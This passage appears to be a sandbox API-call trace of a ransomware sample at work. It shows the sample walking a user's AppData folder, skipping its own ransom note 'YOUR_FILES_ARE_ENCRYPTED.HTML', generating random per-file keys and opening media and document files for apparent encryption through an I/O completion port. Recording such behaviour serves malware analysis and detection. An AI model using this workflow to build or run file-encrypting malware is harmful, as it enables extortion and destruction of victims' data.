[0123.474] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0123.476] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ade9a90, ftCreationTime.dwHighDateTime=0x1d6fbc7, ftLastAccessTime.dwLowDateTime=0x65e04850, ftLastAccessTime.dwHighDateTime=0x1d70075, ftLastWriteTime.dwLowDateTime=0x65e04850, ftLastWriteTime.dwHighDateTime=0x1d70075, nFileSizeHigh=0x0, nFileSizeLow=0xb095, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="TBBDR.gif", cAlternateFileName="")) returned 1 [0123.478] StrStrIW (lpFirst="TBBDR.gif", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.478] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\TBBDR.gif") returned 51 [0123.478] PathFindExtensionW (pszPath="TBBDR.gif") returned=".gif" [0123.478] lstrlenW (lpString=".gif") returned 4 [0123.478] PathFindExtensionW (pszPath="TBBDR.gif") returned=".gif" [0123.478] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0123.478] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\TBBDR.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\tbbdr.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0123.479] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=45205) returned 1 [0123.479] GetProcessHeap () returned 0x600000 [0123.479] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0123.480] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="4E") returned 2 [0123.480] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="A1") returned 2 [0123.480] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="45") returned 2 [0123.481] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="53") returned 2 [0123.481] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="7C") returned 2 [0123.481] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="70") returned 2 [0123.481] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="22") returned 2 [0123.481] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="C0") returned 2 [0123.481] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="98") returned 2 [0123.481] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="D6") returned 2 [0123.481] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="D1") returned 2 [0123.481] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="4E") returned 2 [0123.481] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="A1") returned 2 [0123.481] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="C2") returned 2 [0123.481] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="E1") returned 2 [0123.481] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="19") returned 2 [0123.481] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="14") returned 2 [0123.481] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="86") returned 2 [0123.481] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="78") returned 2 [0123.481] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="C5") returned 2 [0123.481] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="F4") returned 2 [0123.481] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="41") returned 2 [0123.481] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="36") returned 2 [0123.481] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="1C") returned 2 [0123.481] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="9A") returned 2 [0123.481] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="45") returned 2 [0123.481] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="91") returned 2 [0123.481] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="5F") returned 2 [0123.481] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="7E") returned 2 [0123.481] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="49") returned 2 [0123.481] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="D9") returned 2 [0123.481] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="0E") returned 2 [0123.482] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\TBBDR.gif" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\TBBDR.gif") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\TBBDR.gif" [0123.482] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.482] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0123.487] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d222e20, ftCreationTime.dwHighDateTime=0x1d70357, ftLastAccessTime.dwLowDateTime=0x58750800, ftLastAccessTime.dwHighDateTime=0x1d70664, ftLastWriteTime.dwLowDateTime=0x58750800, ftLastWriteTime.dwHighDateTime=0x1d70664, nFileSizeHigh=0x0, nFileSizeLow=0xd03e, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="UIueT5cchWI0Bk.m4a", cAlternateFileName="UIUET5~1.M4A")) returned 1 [0123.487] StrStrIW (lpFirst="UIueT5cchWI0Bk.m4a", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.487] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\UIueT5cchWI0Bk.m4a") returned 60 [0123.487] PathFindExtensionW (pszPath="UIueT5cchWI0Bk.m4a") returned=".m4a" [0123.487] lstrlenW (lpString=".m4a") returned 4 [0123.487] PathFindExtensionW (pszPath="UIueT5cchWI0Bk.m4a") returned=".m4a" [0123.487] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0123.487] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\UIueT5cchWI0Bk.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\uiuet5cchwi0bk.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0123.488] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=53310) returned 1 [0123.488] GetProcessHeap () returned 0x600000 [0123.488] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0123.489] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="A8") returned 2 [0123.489] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="AE") returned 2 [0123.489] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="96") returned 2 [0123.489] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="9C") returned 2 [0123.489] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="F7") returned 2 [0123.489] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="C2") returned 2 [0123.489] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="E2") returned 2 [0123.489] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="B6") returned 2 [0123.489] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="25") returned 2 [0123.489] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="16") returned 2 [0123.489] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="22") returned 2 [0123.489] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="AC") returned 2 [0123.489] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="26") returned 2 [0123.489] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="72") returned 2 [0123.489] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="E0") returned 2 [0123.489] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="50") returned 2 [0123.489] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="9D") returned 2 [0123.489] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="37") returned 2 [0123.489] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="36") returned 2 [0123.489] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="0A") returned 2 [0123.490] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="E4") returned 2 [0123.490] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="AD") returned 2 [0123.490] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="37") returned 2 [0123.490] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="DA") returned 2 [0123.490] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="37") returned 2 [0123.490] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="32") returned 2 [0123.490] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="1F") returned 2 [0123.490] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="EB") returned 2 [0123.490] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="F4") returned 2 [0123.490] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="15") returned 2 [0123.490] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="59") returned 2 [0123.490] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="5F") returned 2 [0123.490] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\UIueT5cchWI0Bk.m4a" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\UIueT5cchWI0Bk.m4a") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\UIueT5cchWI0Bk.m4a" [0123.490] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.490] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0123.494] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b6da150, ftCreationTime.dwHighDateTime=0x1d70807, ftLastAccessTime.dwLowDateTime=0x1e0c9c70, ftLastAccessTime.dwHighDateTime=0x1d709e6, ftLastWriteTime.dwLowDateTime=0x1e0c9c70, ftLastWriteTime.dwHighDateTime=0x1d709e6, nFileSizeHigh=0x0, nFileSizeLow=0xa032, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="V0tB.mkv", cAlternateFileName="")) returned 1 [0123.495] StrStrIW (lpFirst="V0tB.mkv", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.495] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\V0tB.mkv") returned 50 [0123.495] PathFindExtensionW (pszPath="V0tB.mkv") returned=".mkv" [0123.495] lstrlenW (lpString=".mkv") returned 4 [0123.495] PathFindExtensionW (pszPath="V0tB.mkv") returned=".mkv" [0123.495] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14598dc0, ftCreationTime.dwHighDateTime=0x1d70a25, ftLastAccessTime.dwLowDateTime=0x243f8c0, ftLastAccessTime.dwHighDateTime=0x1d70a41, ftLastWriteTime.dwLowDateTime=0x243f8c0, ftLastWriteTime.dwHighDateTime=0x1d70a41, nFileSizeHigh=0x0, nFileSizeLow=0x95ba, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="Wm8cJYFGt3c4vHd.swf", cAlternateFileName="WM8CJY~1.SWF")) returned 1 [0123.495] StrStrIW (lpFirst="Wm8cJYFGt3c4vHd.swf", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.495] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Wm8cJYFGt3c4vHd.swf") returned 61 [0123.495] PathFindExtensionW (pszPath="Wm8cJYFGt3c4vHd.swf") returned=".swf" [0123.495] lstrlenW (lpString=".swf") returned 4 [0123.495] PathFindExtensionW (pszPath="Wm8cJYFGt3c4vHd.swf") returned=".swf" [0123.495] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5633d670, ftCreationTime.dwHighDateTime=0x1d70768, ftLastAccessTime.dwLowDateTime=0x5d8e6c90, ftLastAccessTime.dwHighDateTime=0x1d70a52, ftLastWriteTime.dwLowDateTime=0x5d8e6c90, ftLastWriteTime.dwHighDateTime=0x1d70a52, nFileSizeHigh=0x0, nFileSizeLow=0xf01c, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="zDyVXTIgQPZUlHP.m4a", cAlternateFileName="ZDYVXT~1.M4A")) returned 1 [0123.495] StrStrIW (lpFirst="zDyVXTIgQPZUlHP.m4a", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.495] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\zDyVXTIgQPZUlHP.m4a") returned 61 [0123.495] PathFindExtensionW (pszPath="zDyVXTIgQPZUlHP.m4a") returned=".m4a" [0123.495] lstrlenW (lpString=".m4a") returned 4 [0123.495] PathFindExtensionW (pszPath="zDyVXTIgQPZUlHP.m4a") returned=".m4a" [0123.495] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0123.495] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\zDyVXTIgQPZUlHP.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\zdyvxtigqpzulhp.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0123.496] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=61468) returned 1 [0123.496] GetProcessHeap () returned 0x600000 [0123.496] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0123.497] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="66") returned 2 [0123.497] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="B2") returned 2 [0123.497] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="10") returned 2 [0123.497] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="40") returned 2 [0123.497] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="E2") returned 2 [0123.497] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="89") returned 2 [0123.497] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="EB") returned 2 [0123.497] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="D8") returned 2 [0123.497] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="7B") returned 2 [0123.497] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="4C") returned 2 [0123.497] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="C1") returned 2 [0123.497] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="E9") returned 2 [0123.497] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="5D") returned 2 [0123.497] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="4A") returned 2 [0123.497] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="14") returned 2 [0123.497] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="6E") returned 2 [0123.497] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="C9") returned 2 [0123.497] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="95") returned 2 [0123.497] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="85") returned 2 [0123.497] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="1F") returned 2 [0123.497] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="7A") returned 2 [0123.498] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="9E") returned 2 [0123.498] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="B3") returned 2 [0123.498] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="4A") returned 2 [0123.498] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="0E") returned 2 [0123.498] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="4B") returned 2 [0123.498] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="B9") returned 2 [0123.498] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="34") returned 2 [0123.498] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="B9") returned 2 [0123.498] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="BC") returned 2 [0123.498] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="53") returned 2 [0123.498] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="74") returned 2 [0123.498] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\zDyVXTIgQPZUlHP.m4a" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\zDyVXTIgQPZUlHP.m4a") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\zDyVXTIgQPZUlHP.m4a" [0123.498] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.498] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0123.502] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x927a79d0, ftCreationTime.dwHighDateTime=0x1d6fad0, ftLastAccessTime.dwLowDateTime=0xdd8af670, ftLastAccessTime.dwHighDateTime=0x1d6fd6e, ftLastWriteTime.dwLowDateTime=0xdd8af670, ftLastWriteTime.dwHighDateTime=0x1d6fd6e, nFileSizeHigh=0x0, nFileSizeLow=0xf7be, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="zETeCxiKiBn3EVSGOnT.swf", cAlternateFileName="ZETECX~1.SWF")) returned 1 [0123.502] StrStrIW (lpFirst="zETeCxiKiBn3EVSGOnT.swf", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.502] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\zETeCxiKiBn3EVSGOnT.swf") returned 65 [0123.502] PathFindExtensionW (pszPath="zETeCxiKiBn3EVSGOnT.swf") returned=".swf" [0123.502] lstrlenW (lpString=".swf") returned 4 [0123.502] PathFindExtensionW (pszPath="zETeCxiKiBn3EVSGOnT.swf") returned=".swf" [0123.502] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e9b38f0, ftCreationTime.dwHighDateTime=0x1d7029b, ftLastAccessTime.dwLowDateTime=0x30ba2d10, ftLastAccessTime.dwHighDateTime=0x1d70798, ftLastWriteTime.dwLowDateTime=0x30ba2d10, ftLastWriteTime.dwHighDateTime=0x1d70798, nFileSizeHigh=0x0, nFileSizeLow=0x156e2, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="ZRH24M.mp3", cAlternateFileName="")) returned 1 [0123.502] StrStrIW (lpFirst="ZRH24M.mp3", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.502] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ZRH24M.mp3") returned 52 [0123.502] PathFindExtensionW (pszPath="ZRH24M.mp3") returned=".mp3" [0123.502] lstrlenW (lpString=".mp3") returned 4 [0123.503] PathFindExtensionW (pszPath="ZRH24M.mp3") returned=".mp3" [0123.503] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0123.503] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ZRH24M.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\zrh24m.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0123.503] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=87778) returned 1 [0123.504] GetProcessHeap () returned 0x600000 [0123.504] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0123.504] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="0E") returned 2 [0123.504] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="5F") returned 2 [0123.504] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="78") returned 2 [0123.504] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="D5") returned 2 [0123.504] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="99") returned 2 [0123.504] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="37") returned 2 [0123.504] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="67") returned 2 [0123.504] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="E2") returned 2 [0123.504] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="9C") returned 2 [0123.505] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="9D") returned 2 [0123.505] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="C8") returned 2 [0123.505] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="50") returned 2 [0123.505] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="39") returned 2 [0123.505] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="15") returned 2 [0123.505] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="2F") returned 2 [0123.505] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="15") returned 2 [0123.505] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="17") returned 2 [0123.505] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="7B") returned 2 [0123.505] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="71") returned 2 [0123.505] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="C8") returned 2 [0123.505] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="A2") returned 2 [0123.505] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="9C") returned 2 [0123.505] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="C2") returned 2 [0123.505] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="71") returned 2 [0123.505] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="9C") returned 2 [0123.505] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="B6") returned 2 [0123.505] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="11") returned 2 [0123.505] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="90") returned 2 [0123.505] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="52") returned 2 [0123.505] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="60") returned 2 [0123.505] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="51") returned 2 [0123.505] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="55") returned 2 [0123.506] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ZRH24M.mp3" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ZRH24M.mp3") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ZRH24M.mp3" [0123.506] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.506] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0123.510] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f3fdfd0, ftCreationTime.dwHighDateTime=0x1d70a6f, ftLastAccessTime.dwLowDateTime=0xfa497080, ftLastAccessTime.dwHighDateTime=0x1d70a74, ftLastWriteTime.dwLowDateTime=0xfa497080, ftLastWriteTime.dwHighDateTime=0x1d70a74, nFileSizeHigh=0x0, nFileSizeLow=0x106e6, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="ZxYvlelUIPHgzj.docx", cAlternateFileName="ZXYVLE~1.DOC")) returned 1 [0123.510] StrStrIW (lpFirst="ZxYvlelUIPHgzj.docx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.511] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ZxYvlelUIPHgzj.docx") returned 61 [0123.511] PathFindExtensionW (pszPath="ZxYvlelUIPHgzj.docx") returned=".docx" [0123.511] lstrlenW (lpString=".docx") returned 5 [0123.511] PathFindExtensionW (pszPath="ZxYvlelUIPHgzj.docx") returned=".docx" [0123.511] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0123.511] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ZxYvlelUIPHgzj.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\zxyvleluiphgzj.docx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, 